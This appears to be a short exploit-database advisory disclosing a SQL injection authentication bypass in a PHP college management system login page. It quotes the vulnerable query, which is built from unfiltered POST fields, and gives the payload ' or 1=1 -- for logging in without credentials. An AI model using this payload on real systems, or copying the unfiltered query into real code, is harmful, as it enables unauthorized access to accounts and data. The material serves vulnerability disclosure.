Exploits / Vulnerability Discovered : 2020-06-17 |
Type : webapps |
Platform : php
This exploit / vulnerability Collegemanagementsystemphp 1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
$sql=mysqli_query($con,"SELECT * FROM users_tbl
WHERE username='$uname' AND password='$pwd'
SQL injection vulnerability:-
in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
payload:
' or 1=1 --
Thank you
regards
Abu Safian Blay
https://inveteckglobal.com<http://inveteckglobal.com>